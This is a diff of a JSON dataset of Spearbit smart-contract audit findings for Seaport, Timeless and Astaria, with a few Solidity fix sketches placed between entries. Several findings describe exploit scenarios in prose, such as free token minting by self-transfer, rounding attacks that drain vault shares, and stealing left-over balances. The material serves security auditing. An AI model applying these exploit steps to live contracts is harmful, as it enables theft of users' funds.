Typos in TransferHelperErrors.sol - * @dev Revert with an error when a call to a ERC721 receiver reverts with + * @dev Revert with an error when a call to an ERC721 receiver reverts with The @ NatSpec fields have an extra space in Consideration.sol: * @ The extra space can be removed.", + "title": "Withdraw proxy's claim() endpoint updates public vault's yIntercept incorrectly.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Let y0 be the yIntercept of the public vault in question, n the current epoch for the public vault, E_{n-1} the expected storage parameter of the previous withdraw proxy, B_{n-1} the asset balance of the previous withdraw proxy, W_{n-1} the withdrawReserveReceived of the previous withdraw proxy, S_{n-1} the total supply of the previous withdraw proxy, S_v the total supply of the public vault when processEpoch() was last called on the public vault, B_v the total balance of the public vault when processEpoch() was last called on the public vault, V the public vault, and P_{n-1} the previous withdraw proxy. Then y0 is updated/decremented according to the formula (up to rounding errors due to division): y0 = y0 - max(0, E_{n-1} - (B_{n-1} - W_{n-1})) * (1 - S_{n-1}/S_v), whereas the amount A of assets transferred from P_{n-1} to V is A = (B_{n-1} - W_{n-1}) * (1 - S_{n-1}/S_v), and the amount B of assets left in P_{n-1} after this transfer would be B = W_{n-1} + (B_{n-1} - W_{n-1}) * S_{n-1}/S_v. B_{n-1} - W_{n-1} is supposed to represent the payment the withdraw proxy receives from Seaport auctions plus the amount of assets transferred to it by external actors. So A represents the portion of this amount belonging to users who have not withdrawn from the public vault in the previous epoch; it is transferred to V, and so y0 should be compensated positively. Also note that this amount might be bigger than E_{n-1} if a lien has a really high liquidationInitialAsk and its auction fulfills/matches near that price on Seaport. So it is possible that E_{n-1} < A. The current formula for updating y0 has the following flaws: it only considers updating y0 when E_{n-1} - (B_{n-1} - W_{n-1}) > 0, which is not always the case, and it decrements y0 by a portion of E_{n-1}. The correct updating formula for y0 should be: y0 = y0 - E_{n-1} + (B_{n-1} - W_{n-1}) * (1 - S_{n-1}/S_v). Also note, if we let B_{n-1} - W_{n-1} = X_{n-1} + e, where X_{n-1} is the payment received by the withdraw proxy from Seaport auction payments and e (if W_{n-1} is updated correctly) is the assets received from external actors by the previous withdraw proxy, then: B = W_{n-1} + (X_{n-1} + e) * S_{n-1}/S_v = [max(0, B_v - E_{n-1}) + X_{n-1} + e] * S_{n-1}/S_v. The last equality comes from the fact that when the withdraw reserves are fully transferred from the public vault and the current withdraw proxy (if necessary) to the previous withdraw proxy, the amount W_{n-1} holds should be max(0, B_v - E_{n-1}) * S_{n-1}/S_v. Related Issue.
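Restating the suggested update from the claim() finding above in code form, with WAD fixed-point standing in for the S_{n-1}/S_v ratio. This is a sketch under the finding's own notation; every name here is hypothetical.

pragma solidity ^0.8.17;

contract YInterceptUpdateSketch {
    uint256 internal constant WAD = 1e18;

    // Suggested formula: y0' = y0 - E_{n-1} + (B_{n-1} - W_{n-1}) * (1 - S_{n-1}/S_v)
    function updatedYIntercept(
        uint256 y0,              // current yIntercept
        uint256 expected,        // E_{n-1}
        uint256 balance,         // B_{n-1}
        uint256 reserveReceived, // W_{n-1}
        uint256 withdrawRatio    // S_{n-1}/S_v, WAD-scaled
    ) external pure returns (uint256) {
        // Portion of auction/external proceeds retained for remaining LPs.
        uint256 retained = ((balance - reserveReceived) * (WAD - withdrawRatio)) / WAD;
        // Add before subtracting so that E_{n-1} exceeding the retained
        // amount does not underflow mid-expression.
        return y0 + retained - expected;
    }
}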
", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Consider writing tests for hard coded constants in ConsiderationConstants.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There are many hard coded constants, most being function selectors, that should be tested against.", + "title": "Public vault's yIntercept is not updated when the full amount owed is not paid out by a Seaport auction.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When the full amountOwed for a lien is not paid out during the callback from Seaport to a collateral's ClearingHouse and if the payee is a public vault, we would need to decrement the yIntercept, otherwise the payee.totalAssets() would reflect a wrong value.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Unused / Redundant imports in ZoneInteraction.sol", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There are multiple unused / redundant imports.", + "title": "LienToken payee not reset on transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "payee and ownerOf are detached in that owners may set payee and an owner may transfer the LienToken to a new owner. payee does not reset on transfer. Exploit scenario: the owner of a LienToken sets themselves as payee; the owner of the LienToken sells the lien to a new owner; the new owner does not update payee; payments go to the address set by the old owner.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Orders of CONTRACT order type do not enforce a usage of a specific conduit", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "None of the endpoints (generateOrder and ratifyOrder) for an order of CONTRACT order type en- force using a specific conduit. A contract offerer can enforce the usage of a specific conduit or just Seaport by setting allowances or approval for specific tokens. If a caller calls into different Seaport endpoints and does not provide the correct conduit key, then the order would revert. Currently, the ContractOffererInterface interface does not have a specific endpoint to discover which conduits the contract offerer would prefer users to use. getMetadata() would be able to return a metadata that encodes the conduit key. For (advanced) orders of not CONTRACT order types, the offerer would sign the order and the conduit key is included in the signed hash. Thus, the conduit is enforced whenever that order gets included in a collection by an actor calling Seaport.", + "title": "WithdrawProxy allows redemptions before PublicVault calls transferWithdrawReserve", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Anytime there is a withdraw pending (i.e. someone holds WithdrawProxy shares), shares may be redeemed so long as totalAssets() > 0 and s.finalAuctionEnd == 0. Under normal operating conditions totalAssets() becomes greater than 0 when the PublicVault calls transferWithdrawReserve. 
totalAssets() can also be increased to a non-zero value by anyone transferring WETH to the contract. If this occurs and a user attempts to redeem, they will receive a smaller share than they are owed. Exploit scenario: Depositor redeems from PublicVault and receives WithdrawProxy shares. Malicious actor deposits a small amount of WETH into the WithdrawProxy. Depositor accidentally redeems, or is tricked into redeeming, from the WithdrawProxy while totalAssets() is smaller than it should be. PublicVault properly processes epoch and full withdrawReserve is sent to WithdrawProxy. All remaining holders of WithdrawProxy shares receive an outsized share as the previous shares were redeemed for the incorrect value.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: High Risk" ] }, { - "title": "Calls to Seaport that would fulfill or match a collection of advanced orders can be front-ran to claim any unused offer items", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Calls to Seaport that would fulfill or match a collection of advanced orders can be front-ran to claim any unused offer items. These endpoints include: fulfillAvailableOrders fulfillAvailableAdvancedOrders matchOrders matchAdvancedOrders Anyone can monitor the mempool to find calls to the above endpoints and calculate if there are any unused offer item amounts. If there are unused offer item amounts, the actor can create orders with no offer items, but with consideration items mirroring the unused offer items and populate the fulfillment aggregation data to match the 84 unused offer items with the new mirrored consideration items. It is possible that the call by the actor would be successful under certain conditions. For example, if there are orders of CONTRACT order type involved, the contract offerer might reject this actor (the rejection might also happen by the zones used when validating the order). But in general, this strategy can be implemented by anyone.", + "title": "Point.position is not updated for stack slots in _removeStackPosition", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "A new slot's point.position is set to uint8(params.stack.length), which would be its index in the stack. When _removeStackPosition is called to remove a slot, newStack[i].point.position is not updated for indexes that are greater than position in the original stack. Also, slot.point.position is only used when we emit the AddLien and LienStackUpdated events. In both of those cases, we could have used params.stack.length.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Advance orders of CONTRACT order types can generate orders with more offer items and the extra offer items might not end up being used.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When Seaport gets a collection of advanced orders to fulfill or match, if one of the orders has a CON- TRACT order type, Seaport calls the generateOrder(...) endpoint of that order's offerer. generateOrder(...) can provide extra offer items for this order. These extra offer items might have not been known beforehand by the caller. 
And if the caller would not incorporate the indexes for the extra items in the fulfillment aggregation data, the extra items would end up not being aggregated into any executions.", + "title": "unchecked may cause under/overflows", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "unchecked should only be used when there is a guarantee of no underflows or overflows, or when they are taken into account. In the absence of certainty, it's better to avoid unchecked to favor correctness over gas efficiency. For instance, if by error protocolFeeNumerator is set to be greater than protocolFeeDenominator, this block in _handleProtocolFee() (PublicVault.sol#L640) will underflow: unchecked { amount -= fee; } However, this later reverts due to the ERC20 transfer of an unusually high amount. This is just to demonstrate that unknown bugs can lead to under/overflows.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Typo for the index check comment in _aggregateValidFulfillmentConsiderationItems", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "There is a typo in _aggregateValidFulfillmentConsiderationItems: // Retrieve item index using an offset of the fulfillment pointer. let itemIndex := mload( add(mload(fulfillmentHeadPtr), Fulfillment_itemIndex_offset) ) // Ensure that the order index is not out of range. <---------- the line with typo if iszero(lt(itemIndex, mload(considerationArrPtr))) { throwInvalidFulfillmentComponentData() } The itemIndex above refers to the index in consideration array and not the order.", + "title": "Multiple ERC4626Router and ERC4626RouterBase functions will always revert", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The intention of the ERC4626Router.sol functions is that they are approval-less ways to deposit and redeem: // For the below, no approval needed, assumes vault is already max approved As long as the user has approved the TRANSFER_PROXY for WETH, this works for the depositToVault function: WETH is transferred from user to the router with pullTokens. The router approves the vault for the correct amount of WETH. vault.deposit() is called, which uses safeTransferFrom to transfer WETH from router into vault. However, for the redeemMax function, it doesn't work: Approves the vault to spend the router's WETH. vault.redeem() is called, which tries to transfer vault tokens from the router to the vault, and then mints withdraw proxy tokens to the receiver. This error happens assuming that the vault tokens would be burned, in which case the logic would work. But since they are transferred into the vault until the end of the epoch, we require approvals. The same issue also exists in these two functions in ERC4626RouterBase.sol: redeem(): this is where the incorrect approval lives, so the same issue occurs when it is called directly. 
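A minimal sketch of the failure mode named in the unchecked finding above: when fee > amount, the unchecked subtraction wraps modulo 2**256 instead of reverting, and the bug only surfaces later, at the transfer of an absurdly large amount. The contract is illustrative.

pragma solidity ^0.8.17;

contract UncheckedWrapSketch {
    // Mirrors the flagged pattern: silently wraps when fee > amount.
    function subUnchecked(uint256 amount, uint256 fee) external pure returns (uint256) {
        unchecked {
            return amount - fee; // e.g. 1 - 2 == type(uint256).max
        }
    }

    // Default >=0.8 checked arithmetic reverts at the subtraction itself,
    // which localizes the error instead of deferring it to a later call.
    function subChecked(uint256 amount, uint256 fee) external pure returns (uint256) {
        return amount - fee;
    }
}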
withdraw(): the same faulty approval exists in this function.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Document the unused parameters for orders of CONTRACT order type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "If an advance order advancedOrder is of CONTRACT order type, certain parameters are not being used in the code base, specifically: numerator: only used for skipping certain operations (see AdvancedOrder.numerator and AdvancedOrder.denominator are unchecked for orders of CONTRACT order type) denominator: -- signature: -- parameters.zone: only used when emitting the OrderFulfilled event. parameters.offer.endAmount: endAmount and startAmount for offer items will be set to the amount sent back by generateOrder for the corresponding item. parameters.consideration.endAmount: endAmount and startAmount for consideration items will be set to the amount sent back by generateOrder for the corresponding item parameters.consideration.recipient: the offerer contract returns new recipients when generateOrder gets called parameters.zoneHash: -- parameters.salt: -- parameters.totalOriginalConsiderationItems: --", + "title": "UniV3 tokens with fees can bypass strategist checks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Each UniV3 strategy includes a value for fee in nlrDetails that is used to constrain their strategy to UniV3 pools with matching fees. This is enforced with the following check (where details.fee is the strategist's set fee, and fee is the fee returned from Uniswap): if (details.fee != uint24(0) && fee != details.fee) { revert InvalidFee(); } This means that if you set details.fee to 0, this check will pass, even if the real fee is greater than zero.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "The check against totalOriginalConsiderationItems is skipped for orders of CONTRACT order type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "compares dOrder.parameters.consideration.length: The AdvancedOrder.parameters.totalOriginalConsiderationItems inequality following skipped orders for of is CONTRACT order with type which Advance- // Ensure supplied consideration array length is not less than the original. if (suppliedConsiderationItemTotal < originalConsiderationItemTotal) { _revertMissingOriginalConsiderationItems(); }", + "title": "If auction time is reduced, withdrawProxy can lock funds from final auctions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a new liquidation happens, the withdrawProxy sets s.finalAuctionEnd to be equal to the new incoming auction end. This will usually be fine, because new auctions start later than old auctions, and they all have the same length. However, if the auction time is reduced on the Router, it is possible for a new auction to have an end time that is sooner than an old auction. 
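For the UniV3 fee-bypass finding above, a sketch of the check with the zero-value escape hatch removed, assuming a zero wildcard is not intended behavior; only details.fee, the pool fee, and InvalidFee come from the finding, the rest is illustrative.

pragma solidity ^0.8.17;

contract UniV3FeeCheckSketch {
    error InvalidFee();

    // The original check skips validation when detailsFee == 0, so a
    // strategist fee of 0 matches any pool. Comparing unconditionally
    // forces the strategy to name the exact pool fee it accepts.
    function validateFee(uint24 detailsFee, uint24 poolFee) external pure {
        if (detailsFee != poolFee) revert InvalidFee();
    }
}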
The result will be that the WithdrawProxy is claimable before it should be, and then will lock and not allow anyone to claim the funds from the final auction.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "getOrderStatus returns the default values for orderHash that is derived for orders of CONTRACT order type", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "Since the _orderStatus[orderHash] does not get set for orders of CONTRACT order type, getOrder- Status would always returns (false, false, 0, 0) for those hashes (unless there is a hash collision with other types of orders)", + "title": "claim() will underflow and revert for all tokens without 18 decimals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "In the claim() function, the amount to decrease the Y intercept of the vault is calculated as: (s.expected - balance).mulWadDown(10**ERC20(asset()).decimals() - s.withdrawRatio) s.withdrawRatio is represented as a WAD (18 decimals). As a result, using any token with a number of decimals under 17 (assuming the withdraw ratio is greater than 10%) will lead to an underflow and cause the function to revert. In this situation, the token's decimals don't matter. They are captured in the s.expected and balance, and are also the scale at which the vault's y-intercept is measured, so there's no need to adjust for them. Note: I know this isn't a risk in the current implementation, since it's WETH only, but since you are planning to generalize to accept all ERC20s, this is important.", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "validate skips CONTRACT order types but cancel does not", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "When validating orders validate skips any order of CONTRACT order type, but cancel does not skip these order types. When fulfilling or matching orders for CONTRACT order types, _orderStatus does not get checked or populated. But in cancel the isValidated and the isCancelled fields get set. This is basically a no-op for these order types.", + "title": "Call to Royalty Engine can block NFT auction", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "_generateValidOrderParameters() calls ROYALTY_ENGINE.getRoyaltyView() twice. The first call is wrapped in a try/catch. This lets Astaria continue even if getRoyaltyView() reverts. However, the second call is not safe from this. Both these calls have the same parameters passed to them except the price (startingPrice vs endingPrice). In case they are different, there exists a possibility that the second call can revert.
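For the claim() decimals finding above, a sketch of what the corrected expression might look like: since s.withdrawRatio is WAD-scaled, its complement is WAD - ratio regardless of the asset's decimals. All names here are hypothetical, and mulWadDown is spelled out as plain arithmetic.

pragma solidity ^0.8.17;

contract ClaimRatioSketch {
    uint256 internal constant WAD = 1e18;

    // expected and balance are both denominated in the asset, so the
    // asset's decimals cancel out; only the WAD ratio needs scaling.
    function yInterceptDecrease(
        uint256 expected,     // s.expected
        uint256 balance,      // current asset balance
        uint256 withdrawRatio // s.withdrawRatio, WAD-scaled
    ) external pure returns (uint256) {
        return ((expected - balance) * (WAD - withdrawRatio)) / WAD;
    }
}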
In", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "The literal 0x1c used as the starting offset of a custom error in a revert statement can be replaced by the named constant Error_selector_offset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", - "body": "In the context above, 0x1c is used to signal the start of a custom error block saved in the memory: revert(0x1c, _LENGTH_) For the above literal, we also have a named constant defined in ConsiderationConstants.sol#L410: uint256 constant Error_selector_offset = 0x1c; The named constant Error_selector_offset has been used in most places that a custom error is reverted in an assembly block.", + "title": "Expired liens taken from public vaults need to be liquidated otherwise processing an epoch halts/reverts", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "s.epochData[s.currentEpoch].liensOpenForEpoch is decremented or is supposed to be decre- mented, when for a lien with an end that falls on this epoch: The full payment has been made, Or the lien is bought out by a lien that is from a different vault or ends at a higher epoch, Or the lien is liquidated. If for some reason a lien expires and no one calls liquidate, then s.epochData[s.currentEpoch].liensOpenForEpoch > 0 will be true and processEpoch() would revert till someones calls liquidate. Note that a lien's end falling in the s.currentEpoch and timeToEpochEnd() == 0 imply that the lien is expired. 35", "labels": [ "Spearbit", - "Seaport", - "Severity: Informational" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Mint PerpetualYieldTokens for free by self-transfer", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The PYT.transfer and transferFrom functions operate on cached balance values. When transfer- ring tokens to oneself the decreased balance is overwritten by an increased balance which makes it possible to mint PYT tokens for free. Consider the following exploit scenario: Attacker A self-transfers by calling token.transfer(A, token.balanceOf(A)). balanceOf[msg.sender] is rst set to zero but then overwritten by balanceOf[to] = toBalance + amount, doubling As balance.", + "title": "assets < s.depositCap invariant can be broken for public vaults with non-zero deposit caps", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The following check in mint / deposit does not take into consideration the new shares / amount sup- plied to the endpoint, since the yIntercept in totalAssets() is only updated after calling super.mint(shares, receiver) or super.deposit(amount, receiver) with the afterDeposit hook. 
uint256 assets = totalAssets(); if (s.depositCap != 0 && assets >= s.depositCap) { revert InvalidState(InvalidStates.DEPOSIT_CAP_EXCEEDED); } Thus the new shares or amount provided can be a really big number compared to s.depositCap, but the call will still go through.", "labels": [ "Spearbit", - "Timeless", - "Severity: Critical Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "xPYT auto-compound does not take pounder reward into account", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "Conceptually, the xPYT.pound function performs the following steps: 1. Claims yieldAmount yield for itself, deposits the yield back to receive more PYT/NYT (Gate.claimYieldEnter). 2. Buys xPYT with the NYT. 3. Performs a ERC4626.redeem(xPYT) with the bought amount, burning xPYT and receiving pytAmountRedeemed PYT. 4. Performs a ERC4626.deposit(pytAmountRedeemed + yieldAmount = pytCompounded). 5. Pays out a reward in PYT to the caller. The assetBalance is correctly updated for the rst four steps but does not decrease by the pounder reward which is transferred out in the last step. The impact is that the contract has a smaller assets (PYT) balance than what is tracked in assetBalance. 1. Future depositors will have to make up for it as sweep computes the difference between these two values. 2. The xPYT exchange ratio is wrongly updated and withdrawers can redeem xPYT for more assets than they should until the last withdrawer is left holding valueless xPYT. Consider the following example and assume 100% fees for simplicity i.e. pounderReward = pytCompounded. Vault total: 1k assets, 1k shares total supply. pound with 100% fee: claims Y PYT/NYT. swaps Y NYT to X xPYT. redeems X xPYT for X PYT by burning X xPYT (supply -= X, exchange ratio is 1-to-1 in example). assetBalance is increased by claimed Y PYT pounder receives a pounder reward of X + Y PYT but does not decrease assetBalance by pounder reward X+Y. Vault totals should be 1k-X assets, 1k-X shares, keeping the same share price. Nevertheless, vault totals actually are 1k+Y assets, 1k-X shares. Although pounder receives 100% of pound- ing rewards the xPYT price (assets / shares) increased.", + "title": "redeemFutureEpoch transfers the shares from the msg.sender to the vault instead of from the owner", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "redeemFutureEpoch transfers the vault shares from the msg.sender to the vault instead of from the owner.", "labels": [ "Spearbit", - "Timeless", - "Severity: High Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Wrong yield accumulation in claimYieldAndEnter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The claimYieldAndEnter function does not accrue yield to the Gate contract itself (this) in case xPYT was specied. The idea is to accrue yield for the mint recipient rst before increasing/reducing their balance to not interfere with the yield rewards computation. However, in case xPYT is used, tokens are minted to the Gate before its yield is accrued. Currently, the transfer from this to xPYT through the xPYT.deposit call accrues yield for this after the tokens have been minted to it (userPYTBalance * (updatedYieldPerToken - actualUserYieldPerToken) / PRECI- SION) and its balance increased. 
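For the deposit-cap finding above, a sketch of a check that accounts for the incoming amount before minting, so a single oversized deposit cannot clear a pre-deposit cap check. s.depositCap and the error semantics come from the finding; the contract scaffolding is illustrative.

pragma solidity ^0.8.17;

contract DepositCapSketch {
    uint256 public depositCap;    // s.depositCap in the finding
    uint256 public trackedAssets; // stands in for totalAssets()

    error DepositCapExceeded();

    // Validate the post-deposit total rather than the pre-deposit one.
    function checkCap(uint256 incomingAssets) public view {
        if (depositCap != 0 && trackedAssets + incomingAssets > depositCap) {
            revert DepositCapExceeded();
        }
    }
}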
This leads to it receiving a larger yield amount than it should have.", + "title": "Lien buyouts can push maxPotentialDebt over the limit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When a lien is bought out, _buyoutLien calls _getMaxPotentialDebtForCollateral to confirm that this number is lower than the maxPotentialDebt specified in the lien. However, this function is called with the existing stack, which hasn't yet replaced the lien with the new, bought out lien. Valid refinances can make the rate lower or the time longer. In the case that a lien was bought out for a longer duration, maxPotentialDebt will increase and could go over the limit specified in the lien.", "labels": [ "Spearbit", - "Timeless", - "Severity: High Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "Swapper left-over token balances can be stolen", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The Swapper contract may never have any left-over token balances after performing a swap because token balances can be stolen by anyone in several ways: By using Swapper.doZeroExSwap with useSwapperBalance and tokenOut = tokenToSteal Arbitrary token approvals to arbitrary spenders can be set on behalf of the Swapper contract using UniswapV3Swapper.swapUnderlyingToXpyt.", + "title": "Liens cannot be bought out once we've reached the maximum number of active liens on one collateral", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "The buyoutLien function is intended to transfer ownership of a lien from one user to another. In practice, it creates a new lien by calling _createLien and then calls _replaceStackAtPositionWithNewLien to update the stack. In the _createLien function, there is a check to ensure we don't take out more than maxLiens against one piece of collateral: if (params.stack.length >= s.maxLiens) { revert InvalidState(InvalidStates.MAX_LIENS); } The result is that, when we already have maxLiens and we try to buy one out, this function will revert.", "labels": [ "Spearbit", - "Timeless", - "Severity: High Risk" + "Astaria", + "Severity: Medium Risk" ] }, { - "title": "TickMath might revert in solidity version 0.8", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "UniswapV3s TickMath library was changed to allow compilations for solidity version 0.8. However, adjustments to account for the implicit overow behavior that the contract relies upon were not performed. The In UniswapV3xPYT.sol is compiled with version 0.8 and indirectly uses this library through the OracleLibrary. the worst case, it could be that the library always reverts (instead of overowing as in previous versions), leading to a broken xPYT contract. The same pragma solidity >=0.5.0; instead of pragma solidity >=0.5.0 <0.8.0; adjustments have been made for the OracleLibrary and PoolAddress contracts. However, their code does not rely on implicit overow behavior.", + "title": "First vault deposit can cause excessive rounding", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "Aside from storage layout/getters, the context above notes the other major departure from Solmate's ERC4626 implementation. The modification requires the initial mint to cost 10 full WETH. 
function mint( uint256 shares, address receiver ) public virtual returns (uint256 assets) { // assets is 10e18, or 10 WETH, whenever totalSupply() == 0 assets = previewMint(shares); // No need to check for rounding error, previewMint rounds up. // Need to transfer before minting or ERC777s could reenter. // minter transfers 10 WETH to the vault ERC20(asset()).safeTransferFrom(msg.sender, address(this), assets); // shares received are based on user input _mint(receiver, shares); emit Deposit(msg.sender, receiver, assets, shares); afterDeposit(assets, shares); } Astaria highlighted that the code diff from Solmate is in relation to this finding from the previous Sherlock audit. However, deposit is still unchanged and the initial deposit may be 1 wei worth of WETH, in return for 1 wad worth of vault shares. Further, the previously cited issue may still surface by calling mint in a way that sets the price per share high (e.g. 10 shares for 10 WETH produces a price per share of 1:1e18), albeit at a higher cost to the minter to set the initial price that high.", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Medium Risk" ] - }, - { - "title": "Rounding issues when exiting a vault through shares", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "When exiting a vault through Gate.exitToVaultShares the user species a vaultSharesAmount. The amount of PYT&NYT to burn is determined by a burnAmount = _vaultSharesAmountToUnderlying- this function in derived YearnGate and ERC4626 Amount(vaultSharesAmount) call. All contracts round down the burnAmount. This means one needs to burn fewer amounts than the value of the received vault shares. implementations of This attack can be protable and lead to all vault shares being stolen If the gas costs of this attack are low. This can be the case with vault & underlying tokens with a low number of decimals, highly valuable shares, or cheap gas costs. Consider the following scenario: 7 Imagine the following vault assets: totalAssets = 1.9M, supply = 1M. Therefore, 1 share is theoretically worth 1.9 underlying. Call enterWithUnderlying(underlyingAmount = 1900) to mint 1900 PYT/NYT (and the gate receives 1900 * supply / totalAssets = 1000 vault shares). Call exitToVaultShares(vaultSharesAmount = 1), then burnAmount = shares.mulDivDown(totalAssets(), supply) = 1 * totalAssets / supply = 1. This burns 1 \"underlying\" (actually PYT/NYT but they are 1-to-1), but receive 1 vault share (worth 1.9 underlying). Repeat this for up to the minted 1900 PYT/NYT. 
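One possible mitigation for the first-deposit finding above is to apply the same floor on the deposit() path that mint() already enforces. This sketch assumes a hypothetical guard called before shares are issued; the 10 WETH constant mirrors the finding's figure, everything else is illustrative.

pragma solidity ^0.8.17;

contract FirstDepositFloorSketch {
    uint256 public totalSupply; // vault share supply
    uint256 internal constant MIN_FIRST_DEPOSIT = 10e18; // 10 WETH, as in mint()

    error FirstDepositTooSmall();

    // Reject a dust-sized first deposit so the initial share price
    // cannot be seeded at 1 wei of assets for 1 wad of shares.
    function checkFirstDeposit(uint256 assets) public view {
        if (totalSupply == 0 && assets < MIN_FIRST_DEPOSIT) {
            revert FirstDepositTooSmall();
        }
    }
}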
Can redeem the 1900 vault shares for 3610 underlying directly at the vault, making a prot of 3610 - 1900 = 1710 underlying.", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "When the collateral is listed on SeaPort by the borrower using listForSaleOnSeaport, when settled the liquidation fee will be sent to address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "title": "When the collateral is listed on SeaPort by the borrower using listForSaleOnSeaport, when settled the liquidation fee will be sent to address(0)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Astaria-Spearbit-Security-Review.pdf", + "body": "When the collateral is listed on Seaport by the borrower using listForSaleOnSeaport, s.auctionData[collateralId].liquidator (s.auctionData in general) will not be set, and so it will be address(0); thus the liquidatorPayment will be sent to address(0).", "labels": [ "Spearbit", - "Timeless", + "Astaria", "Severity: Medium Risk" ] }, { - "title": "Possible outstanding allowances from Gate", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Timeless-Spearbit-Security-Review.pdf", - "body": "The vault parameter of Gate.enterWithUnderlying can be chosen by an attacker in such a way that underlying = vault.asset() is another vault token of the Gate itself. The subsequent _depositInto- Vault(underlying, underlyingAmount, vault) call will approve underlyingAmount of underlying tokens to the provided vault and could in theory allow stealing from other vault shares. This is currently only exploitable in very rare cases because the caller also has to transfer the underlyingAmount to the gate contract rst. For example, when transferring underlyingAmount = type(uint256).max is possible due to ashloans/ashmints and the vault shares implement approvals in a way that do not decrease anymore if the allowance is type(uint256).max, as is the case with ERC4626 vaults.", + "title": "potentialDebt is not compared against a new lien's maxPotentialDebt in _appendStack", + "html_url": 